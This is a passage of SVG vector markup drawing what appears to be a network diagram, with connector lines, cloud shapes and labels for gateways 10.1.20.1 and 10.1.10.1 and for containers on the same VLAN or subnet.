transform="translate(0,0)"><g transform="translate(-274,-128.00000000000003) translate(2.499999999999943,31.58952732449731) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#ff9900" d="M 278.00000000000006 102.91047267550272 M 278.00000000000006 102.91047267550272 L 278.00000000000006 108.91047267550272 M 278.00000000000006 108.91047267550272 M 278.00000000000006 114.91047267550272 L 278.00000000000006 120.91047267550272 M 278.00000000000006 120.91047267550272 M 278.00000000000006 126.91047267550272 L 278.00000000000006 132.91047267550272 M 278.00000000000006 132.91047267550272 M 278.00000000000006 138.91047267550272 L 278.00000000000006 144.91047267550272 M 278.00000000000006 144.91047267550272 M 278.00000000000006 150.91047267550272 L 278.00000000000006 156.91047267550272 M 278.00000000000006 156.91047267550272 M 278.00000000000006 162.91047267550272 L 278.00000000000006 168.91047267550272 M 278.00000000000006 168.91047267550272 M 278.00000000000006 174.91047267550272 L 278.00000000000006 180.91047267550272 M 278.00000000000006 180.91047267550272 M 278.00000000000006 186.91047267550272 L 278.00000000000006 192.91047267550272 M 278.00000000000006 192.91047267550272 M 278.00000000000006 198.91047267550272 L 278.00000000000006 204.91047267550272 M 278.00000000000006 204.91047267550272 M 278.00000000000006 210.91047267550272 L 278.00000000000006 216.91047267550272 M 278.00000000000006 216.91047267550272 M 278.00000000000006 222.91047267550272 L 278.00000000000006 228.91047267550272 M 278.00000000000006 228.91047267550272 M 278.00000000000006 234.91047267550272 L 278.00000000000006 240.91047267550272 M 278.00000000000006 240.91047267550272 M 278.00000000000006 246.91047267550272 L 278.00000000000006 252.91047267550272 M 278.00000000000006 252.91047267550272 M 278.00000000000006 258.9104726755027 L 278.00000000000006 264.9104726755027 M 278.00000000000006 264.9104726755027 M 278.00000000000006 270.9104726755027 L 278.00000000000006 276.9104726755027 M 278.00000000000006 276.9104726755027 M 278.00000000000006 282.9104726755027 L 278.00000000000006 288.9104726755027 M 278.00000000000006 288.9104726755027 M 278.00000000000006 294.9104726755027 L 278.0000000000001 300.9104726755027 M 278.0000000000001 300.9104726755027" stroke-miterlimit="10" stroke-width="6"/></g></g></g></g><g transform="matrix(1,0,0,1,284.40277777777806,243.31491457745426)"><g transform="translate(0,0)"><g transform="translate(-104.62600160256406,-181.95081824533966) translate(-179.776776175214,-61.3640963321146) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#cc0000" d="M 395.6805555555633 368.59527295942837 M 395.6805555555633 368.59527295942837 L 395.6805555555633 362.59527295942837 M 395.6805555555633 362.59527295942837 M 395.6805555555633 356.59527295942837 L 395.6805555555633 350.59527295942837 M 395.6805555555633 350.59527295942837 M 395.6805555555633 344.59527295942837 L 395.6805555555633 338.59527295942837 M 395.6805555555633 338.59527295942837 M 395.6805555555633 332.59527295942837 L 395.6805555555633 326.59527295942837 M 395.6805555555633 326.59527295942837 M 395.6805555555633 320.59527295942837 L 395.6805555555633 314.59527295942837 M 395.6805555555633 314.59527295942837 M 395.6454730957975 308.5959974887863 Q 395.42473204507803 305.08992137071624 393.81507437340014 302.97276187360467 M 393.81507437340014 302.97276187360467 M 388.7448234749301 300.0250475217899 Q 387.3524512811001 299.74552399008303 385.6805555555633 299.74552399008303 L 382.7625569263178 299.74552399008303 M 382.7625569263178 299.74552399008303 M 376.7625569263178 299.74552399008303 L 370.7625569263178 299.74552399008303 M 370.7625569263178 299.74552399008303 M 364.7625569263178 299.74552399008303 L 358.7625569263178 299.74552399008303 M 358.7625569263178 299.74552399008303 M 352.7625569263178 299.74552399008303 L 346.7625569263178 299.74552399008303 M 346.7625569263178 299.74552399008303 M 340.7625569263178 299.74552399008303 L 334.7625569263178 299.74552399008303 M 334.7625569263178 299.74552399008303 M 328.7625569263178 299.74552399008303 L 322.7625569263178 299.74552399008303 M 322.7625569263178 299.74552399008303 M 316.7625569263178 299.74552399008303 L 310.7625569263178 299.74552399008303 M 310.7625569263178 299.74552399008303 M 304.7625569263178 299.74552399008303 L 300.90277777777806 299.74552399008303 Q 299.7712873305603 299.74552399008303 298.7678239465571 299.6174969268685 M 298.7678239465571 299.6174969268685 M 293.3857693473039 297.228457504614 Q 291.4531834876415 295.28265607285664 291.0247864262038 291.83266584287463 M 291.0247864262038 291.83266584287463 M 290.90277777777806 285.8375555400254 L 290.90277777777806 279.8375555400254 M 290.90277777777806 279.8375555400254 M 290.90277777777806 273.8375555400254 L 290.90277777777806 267.8375555400254 M 290.90277777777806 267.8375555400254 M 290.90277777777806 261.8375555400254 L 290.90277777777806 255.8375555400254 M 290.90277777777806 255.8375555400254 M 290.90277777777806 249.8375555400254 L 290.90277777777806 249.81491457745426" stroke-miterlimit="10" stroke-width="6"/></g></g></g></g><g transform="matrix(1,0,0,1,284.40277777777794,125.75909597261261)"><g transform="translate(0,0)"><g transform="translate(-520.5887419871792,-284.3176338453479) translate(236.18596420940128,158.55853787273531) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#cc0000" d="M 399.0972222222224 132.2590959726126 M 399.0972222222224 132.2590959726126 L 399.0972222222224 138.2590959726126 M 399.0972222222224 138.2590959726126 M 399.0972222222224 144.2590959726126 L 399.0972222222224 150.2590959726126 M 399.0972222222224 150.2590959726126 M 399.0972222222224 156.2590959726126 L 399.0972222222224 162.2590959726126 M 399.0972222222224 162.2590959726126 M 399.0972222222224 168.2590959726126 L 399.0972222222224 174.2590959726126 M 399.0972222222224 174.2590959726126 M 399.0972222222224 180.2590959726126 L 399.0972222222224 186.2590959726126 M 399.0972222222224 186.2590959726126 M 399.0972222222224 192.2590959726126 L 399.0972222222224 192.67013315779485 Q 399.0972222222224 195.91836389834842 398.0421219278347 198.11149434451426 M 398.0421219278347 198.11149434451426 M 393.6659405128273 201.97829744802294 Q 391.72749922241087 202.67013315779496 389.0972222222224 202.67013315779502 L 387.7405118088071 202.67013315779505 M 387.7405118088071 202.67013315779505 M 381.7405118088071 202.67013315779514 L 375.7405118088071 202.67013315779522 M 375.7405118088071 202.67013315779522 M 369.7405118088071 202.6701331577953 L 363.7405118088071 202.6701331577954 M 363.7405118088071 202.6701331577954 M 357.7405118088071 202.67013315779548 L 351.7405118088071 202.67013315779556 M 351.7405118088071 202.67013315779556 M 345.7405118088071 202.67013315779565 L 339.7405118088071 202.67013315779573 M 339.7405118088071 202.67013315779573 M 333.7405118088071 202.67013315779585 L 327.7405118088071 202.67013315779593 M 327.7405118088071 202.67013315779593 M 321.7405118088071 202.67013315779604 L 315.7405118088071 202.67013315779613 M 315.7405118088071 202.67013315779613 M 309.7405118088071 202.67013315779624 L 303.7405118088071 202.67013315779633 M 303.7405118088071 202.67013315779633 M 297.7598678856485 202.9657135423712 Q 294.4328042761472 203.65647640532174 292.72003362291935 205.9615322245457 M 292.72003362291935 205.9615322245457 M 290.93300792210687 211.60072437358687 Q 290.90277777777794 212.12031369352724 290.90277777777794 212.67013315779656 L 290.90277777777794 217.600146725365 M 290.90277777777794 217.600146725365 M 290.90277777777794 223.600146725365 L 290.90277777777794 229.600146725365 M 290.90277777777794 229.600146725365 M 290.90277777777794 235.600146725365 L 290.90277777777794 241.600146725365 M 290.90277777777794 241.600146725365 M 290.90277777777794 247.600146725365 L 290.90277777777794 251.03945435457118" stroke-miterlimit="10" stroke-width="6"/></g></g></g></g><g transform="matrix(1,0,0,1,155.81944444443684,107.17033542596326)"><g transform="translate(0,0)"><g transform="translate(-453.3739983974361,-305.60207610719107) translate(297.55455395299924,198.4317406812278) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#38761d" d="M 162.31944444443684 113.67033542596326 M 162.31944444443684 113.67033542596326 L 162.31944444443684 119.67033542596326 M 162.31944444443684 119.67033542596326 M 162.31944444443684 125.67033542596326 L 162.31944444443684 131.67033542596326 M 162.31944444443684 131.67033542596326 M 162.31944444443684 137.67033542596326 L 162.31944444443684 143.67033542596326 M 162.31944444443684 143.67033542596326 M 162.31944444443684 149.67033542596326 L 162.31944444443684 155.67033542596326 M 162.31944444443684 155.67033542596326 M 162.31944444443684 161.67033542596326 L 162.31944444443684 167.67033542596326 M 162.31944444443684 167.67033542596326 M 162.31944444443684 173.67033542596326 L 162.31944444443684 179.67033542596326 M 162.31944444443684 179.67033542596326 M 162.31944444443684 185.67033542596326 L 162.31944444443684 189.5415587499461 Q 162.31944444443684 190.66665091919444 162.44602768336722 191.66515984951238 M 162.44602768336722 191.66515984951238 M 164.82839767826374 197.05049598033753 Q 166.77191548654997 198.987072120429 170.22094619965992 199.41813535569676 M 170.22094619965992 199.41813535569676 M 176.2159687190514 199.5415587499461 L 182.2159687190514 199.5415587499461 M 182.2159687190514 199.5415587499461 M 188.2159687190514 199.5415587499461 L 194.2159687190514 199.5415587499461 M 194.2159687190514 199.5415587499461 M 200.2159687190514 199.5415587499461 L 206.2159687190514 199.5415587499461 M 206.2159687190514 199.5415587499461 M 212.2159687190514 199.5415587499461 L 218.2159687190514 199.5415587499461 M 218.2159687190514 199.5415587499461 M 224.2159687190514 199.5415587499461 L 230.2159687190514 199.5415587499461 M 230.2159687190514 199.5415587499461 M 236.2159687190514 199.5415587499461 L 242.2159687190514 199.5415587499461 M 242.2159687190514 199.5415587499461 M 248.2159687190514 199.5415587499461 L 254.2159687190514 199.5415587499461 M 254.2159687190514 199.5415587499461 M 260.1975055563821 199.82836878769723 Q 263.5309416038837 200.5080005580397 265.2539063203237 202.79810365944377 M 265.2539063203237 202.79810365944377 M 267.0644085030223 208.4287072615088 Q 267.09722222222206 208.96872614612755 267.09722222222206 209.5415587499461 L 267.09722222222206 214.4280528453731 M 267.09722222222206 214.4280528453731 M 267.09722222222206 220.4280528453731 L 267.09722222222206 226.4280528453731 M 267.09722222222206 226.4280528453731 M 267.09722222222206 232.4280528453731 L 267.09722222222206 235.81551770804643" stroke-miterlimit="10" stroke-width="6"/></g></g></g></g><g transform="matrix(1,0,0,1,152.4027777777773,228.0562890247442)"><g transform="translate(0,0)"><g transform="translate(-37.41125801282108,-200.3354013688455) translate(-114.99151976495621,-27.72088765589868) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#38761d" d="M 158.9027777777773 356.7014713068111 M 158.9027777777773 356.7014713068111 L 158.9027777777773 350.7014713068111 M 158.9027777777773 350.7014713068111 M 158.9027777777773 344.7014713068111 L 158.9027777777773 338.7014713068111 M 158.9027777777773 338.7014713068111 M 158.9027777777773 332.7014713068111 L 158.9027777777773 326.7014713068111 M 158.9027777777773 326.7014713068111 M 158.9027777777773 320.7014713068111 L 158.90277777777732 314.7014713068111 M 158.90277777777732 314.7014713068111 M 158.9386276948351 308.7022201112491 Q 159.16189382506047 305.19660315095655 160.77561686556083 303.081443100939 M 160.77561686556083 303.081443100939 M 165.85041734767782 300.14100539293156 Q 167.23802796592435 299.86386619932506 168.90277777777732 299.863866199325 L 171.83292026888248 299.8638661993249 M 171.83292026888248 299.8638661993249 M 177.83292026888248 299.86386619932466 L 183.83292026888248 299.86386619932443 M 183.83292026888248 299.86386619932443 M 189.83292026888248 299.8638661993242 L 195.83292026888248 299.863866199324 M 195.83292026888248 299.863866199324 M 201.83292026888248 299.86386619932375 L 207.83292026888248 299.8638661993235 M 207.83292026888248 299.8638661993235 M 213.83292026888248 299.8638661993233 L 219.83292026888248 299.86386619932307 M 219.83292026888248 299.86386619932307 M 225.83292026888248 299.86386619932284 L 231.83292026888248 299.8638661993226 M 231.83292026888248 299.8638661993226 M 237.83292026888248 299.8638661993224 L 243.83292026888248 299.86386619932216 M 243.83292026888248 299.86386619932216 M 249.83292026888248 299.86386619932193 L 255.83292026888248 299.86386619932176 M 255.83292026888248 299.86386619932176 M 261.7528202251644 299.1405476054279 Q 264.7675844859315 298.0314529459795 266.0817275073145 295.22173704714703 M 266.0817275073145 295.22173704714703 M 267.0972222222195 289.3604205540609 L 267.0972222222195 283.3604205540609 M 267.0972222222195 283.3604205540609 M 267.0972222222195 277.3604205540609 L 267.0972222222195 271.3604205540609 M 267.0972222222195 271.3604205540609 M 267.0972222222195 265.3604205540609 L 267.0972222222195 259.3604205540609 M 267.0972222222195 259.3604205540609 M 267.0972222222195 253.3604205540609 L 267.0972222222195 247.3604205540609 M 267.0972222222195 247.3604205540609 M 267.0972222222195 241.3604205540609 L 267.0972222222195 235.3604205540609 M 267.0972222222195 235.3604205540609" stroke-miterlimit="10" stroke-width="6"/></g></g></g></g><g transform="translate(0,0) matrix(1,0,0,1,193.51767083236396,40.461511948529306)"><g><g transform="translate(0,0) scale(1.7520258247164675,1.25824690354917) translate(0.00001348378,-0.001498589)"><g><g><path fill="#FFFFFF" stroke="#ff9900" d="M 33.84 5.912 C 16.263 2.403 6.986 11.405 8.451 19.186 L 8.57 19.61 C -5.128 21.942 -1.537 38.106 5.033 38.106 L 5.679 38.085 C 4.026 45.68 20.032 53.41 28.958 49.548 L 29.531 48.92 C 32.713 55.752 44.02 56.893 55.201 57.177 C 64.89 57.425 70.546 56.658 74.702 52.411 L 75.341 52.599 C 90.852 53.845 97.915 43.133 94.526 35.442 L 95.36 35.207 C 100.648 33.808 101.258 21.602 92.187 19.797 L 92.361 19.325 C 96.299 11.385 87.011 3.896 74.124 5.303 L 73.23 4.837 C 64.003 -3.517 37.449 -2.157 34.373 6.108 L 33.84 5.912 Z" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g></g><g transform="matrix(1,0,0,1,213,55)"><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="137" height="56" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="137" height="14" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="18" y="0" width="51" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="18" y="12">Gateway</text></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="69" y="0" width="51" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="69" y="12">10</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="82" y="12">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="86" y="12">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="92" y="12">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="96" y="12">20</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="109" y="12">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="112" y="12">1</text></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="137" height="28" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="2" y="14" width="4" height="14" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="5" y="14" width="58" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="9" y="26">and</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="32" y="26">other</text></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="63" y="14" width="129" height="28" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="63" y="26">containers</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="122" y="26">on</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="7" y="40">the</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="27" y="40">same</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="59" y="40">VLAN</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="91" y="40">/</text></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="94" y="28" width="37" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="94" y="40">subnet</text></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="42" width="137" height="14" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="67" y="42" width="5" height="14" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g/></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,345.9019607843137,48.00000000000003)"><g><g transform="translate(0,0) scale(0.3709803921568625,0.18000000000000005)"><g><path fill="#4cacf5" stroke="none" d="M 0 0 L 100 0 Q 100 0 100 0 L 100 100 Q 100 100 100 100 L 0 100 Q 0 100 0 100 L 0 0 Q 0 0 0 0 Z"/><g transform="scale(2.6955602536997905,5.5555555555555545)"><path fill="none" stroke="none" d="M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z"/><path fill="none" stroke="#666666" d="M 0 0 M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z" stroke-miterlimit="10"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,341.48549019607844,44.15384615384616)"><g><g transform="translate(0,0) scale(0.3709803921568625,0.18000000000000005)"><g><path fill="#4cacf5" stroke="none" d="M 0 0 L 100 0 Q 100 0 100 0 L 100 100 Q 100 100 100 100 L 0 100 Q 0 100 0 100 L 0 0 Q 0 0 0 0 Z"/><g transform="scale(2.6955602536997905,5.5555555555555545)"><path fill="none" stroke="none" d="M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z"/><path fill="none" stroke="#666666" d="M 0 0 M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z" stroke-miterlimit="10"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,336,39.00000000000003)"><g><g transform="translate(0,0) scale(0.3709803921568625,0.18000000000000005)"><g><path fill="#4cacf5" stroke="none" d="M 0 0 L 100 0 Q 100 0 100 0 L 100 100 Q 100 100 100 100 L 0 100 Q 0 100 0 100 L 0 0 Q 0 0 0 0 Z"/><g transform="scale(2.6955602536997905,5.5555555555555545)"><path fill="none" stroke="none" d="M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z"/><path fill="none" stroke="#666666" d="M 0 0 M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z" stroke-miterlimit="10"/></g></g></g></g></g><g transform="translate(0,0) matrix(1,0,0,1,57.51767083236396,94.4615119485293)"><g><g transform="translate(0,0) scale(1.7520258247164675,1.25824690354917) translate(0.00001348378,-0.001498589)"><g><g><path fill="#FFFFFF" stroke="#38761d" d="M 33.84 5.912 C 16.263 2.403 6.986 11.405 8.451 19.186 L 8.57 19.61 C -5.128 21.942 -1.537 38.106 5.033 38.106 L 5.679 38.085 C 4.026 45.68 20.032 53.41 28.958 49.548 L 29.531 48.92 C 32.713 55.752 44.02 56.893 55.201 57.177 C 64.89 57.425 70.546 56.658 74.702 52.411 L 75.341 52.599 C 90.852 53.845 97.915 43.133 94.526 35.442 L 95.36 35.207 C 100.648 33.808 101.258 21.602 92.187 19.797 L 92.361 19.325 C 96.299 11.385 87.011 3.896 74.124 5.303 L 73.23 4.837 C 64.003 -3.517 37.449 -2.157 34.373 6.108 L 33.84 5.912 Z" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g></g><g transform="matrix(1,0,0,1,77,109)"><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="137" height="56" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="137" height="14" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="18" y="0" width="51" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="18" y="12">Gateway</text></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="69" y="0" width="51" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="69" y="12">10</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="82" y="12">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="86" y="12">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="92" y="12">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="96" y="12">10</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="109" y="12">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="112" y="12">1</text></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="137" height="28" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="2" y="14" width="4" height="14" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="5" y="14" width="58" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="9" y="26">and</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="32" y="26">other</text></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="63" y="14" width="129" height="28" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="63" y="26">containers</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="122" y="26">on</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="7" y="40">the</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="27" y="40">same</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="59" y="40">VLAN</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="91" y="40">/</text></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="94" y="28" width="37" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="94" y="40">subnet</text></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="42" width="137" height="14" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="67" y="42" width="5" height="14" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g/></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,98.9019607843137,163.00000000000003)"><g><g transform="translate(0,0) scale(0.3709803921568625,0.18000000000000005)"><g><path fill="#4cacf5" stroke="none" d="M 0 0 L 100 0 Q 100 0 100 0 L 100 100 Q 100 100 100 100 L 0 100 Q 0 100 0 100 L 0 0 Q 0 0 0 0 Z"/><g transform="scale(2.6955602536997905,5.5555555555555545)"><path fill="none" stroke="none" d="M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z"/><path fill="none" stroke="#666666" d="M 0 0 M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z" stroke-miterlimit="10"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,94.48549019607844,159.15384615384616)"><g><g transform="translate(0,0) scale(0.3709803921568625,0.18000000000000005)"><g><path fill="#4cacf5" stroke="none" d="M 0 0 L 100 0 Q 100 0 100 0 L 100 100 Q 100 100 100 100 L 0 100 Q 0 100 0 100 L 0 0 Q 0 0 0 0 Z"/><g transform="scale(2.6955602536997905,5.5555555555555545)"><path fill="none" stroke="none" d="M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z"/><path fill="none" stroke="#666666" d="M 0 0 M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z" stroke-miterlimit="10"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,89,154.00000000000003)"><g><g transform="translate(0,0) scale(0.3709803921568625,0.18000000000000005)"><g><path fill="#4cacf5" stroke="none" d="M 0 0 L 100 0 Q 100 0 100 0 L 